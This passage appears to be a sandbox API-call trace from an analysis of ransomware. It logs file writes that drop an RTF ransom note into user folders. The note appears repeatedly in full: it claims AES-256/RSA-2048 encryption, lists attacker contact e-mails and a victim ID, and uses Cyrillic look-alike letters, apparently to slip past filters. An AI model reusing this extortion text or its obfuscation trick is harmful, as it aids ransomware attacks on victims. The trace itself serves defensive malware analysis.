\\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.008] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.008] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.009] CloseHandle (hObject=0x1cc) returned 1 [0068.009] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\bg85_info.rtf")) returned 0xffffffff [0068.009] GetLastError () returned 0x2 [0068.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 